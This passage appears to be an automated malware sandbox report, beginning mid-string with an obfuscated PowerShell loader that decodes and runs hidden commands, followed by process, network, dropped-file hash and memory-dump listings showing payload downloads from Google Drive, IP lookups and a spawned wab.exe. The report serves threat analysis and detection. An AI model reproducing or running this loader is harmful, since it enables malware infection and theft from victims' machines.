irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.169.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 20.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 33.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 142.250.187.238:443 drive.google.com tcp
GB 172.217.169.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 3f44b1c79c509dd186323a817d847674
SHA1 b2949cdc34fbe95d0d77f5dea144445d5b7cf78d
SHA256 f2cf46f19948aa002236ed9eac587a4eb3f914a56280a872640b5b30eafa6b0a
SHA512 30e44232012a66b3aea0ce7605f0fa7a628048b707e37d8a76ce42b939be52b46a301049b8b5796e54f7d787ca48c914e8b9a7e13ed2cba3b8fe58ff0d40185b

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 675326a981cefa842930734b5c9ee3bd
SHA1 3591809f3339f0e9a22ec835ff7c46077da90fd3
SHA256 cc8dd61c508a5b6a490011662b4ed0c82335c1c2c50b19b1c6f579c2e971affd
SHA512 fe2590005684b1fc879a5f1fc36ee2e73af79010f7dc86ed1bd8dd18ca65859320bbea441b2303cc91a9813ab6c886334238c931a751edaba724e40e12985d84

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 881493d7ec3ce1c66e2249660ae3d361
SHA1 3698f16689f485c0c7c127227da8a9d780fb08aa
SHA256 002beb6a1061e9bab51fcc3afaa08fb61fd3b06190913b4c75b790999609e6a6
SHA512 e5b93117f80487ae7b63630eb4e3f3cfa02eb03512a5f4798da224e9fc7c6635dc30f07093f10c2868b5df1cd3d23adbf3eb69e1fcbe052de6e7e7e67b861f02

memory/1196-322-0x00007FF899AA3000-0x00007FF899AA5000-memory.dmp

memory/1196-323-0x0000026CD7DB0000-0x0000026CD7DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_va1y1fnr.sqa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1196-333-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/1196-334-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/3612-337-0x000000007482E000-0x000000007482F000-memory.dmp

memory/3612-338-0x00000000024A0000-0x00000000024D6000-memory.dmp

memory/3612-339-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-340-0x0000000004F50000-0x0000000005578000-memory.dmp

memory/3612-341-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-342-0x0000000005630000-0x0000000005652000-memory.dmp

memory/3612-343-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/3612-348-0x00000000057B0000-0x0000000005816000-memory.dmp

memory/3612-354-0x0000000005920000-0x0000000005C74000-memory.dmp

memory/3612-355-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

memory/3612-356-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

memory/3612-357-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/3612-358-0x0000000006370000-0x000000000638A000-memory.dmp

memory/3612-360-0x0000000006FD0000-0x0000000006FF2000-memory.dmp

memory/3612-359-0x0000000007040000-0x00000000070D6000-memory.dmp

memory/3612-361-0x0000000007DF0000-0x0000000008394000-memory.dmp

C:\Users\Admin\AppData\Roaming\Scrouge.Swi

MD5 be60fe46432e08e827aeefd9f72d5790
SHA1 7322ebc77810e84976136174258dddde78a23f27
SHA256 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
SHA512 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913

memory/3612-363-0x00000000083A0000-0x000000000DFF9000-memory.dmp

memory/1196-364-0x00007FF899AA3000-0x00007FF899AA5000-memory.dmp

memory/1196-365-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/3612-368-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-367-0x000000007482E000-0x000000007482F000-memory.dmp

memory/3612-369-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3612-383-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/1156-382-0x0000000001000000-0x0000000002254000-memory.dmp

memory/1156-384-0x0000000001000000-0x0000000001042000-memory.dmp

memory/1196-387-0x00007FF899AA0000-0x00007FF89A561000-memory.dmp

memory/1156-388-0x00000000263E0000-0x0000000026430000-memory.dmp

memory/1156-389-0x0000000026B00000-0x0000000026B92000-memory.dmp

memory/1156-390-0x0000000026430000-0x000000002643A000-memory.dmp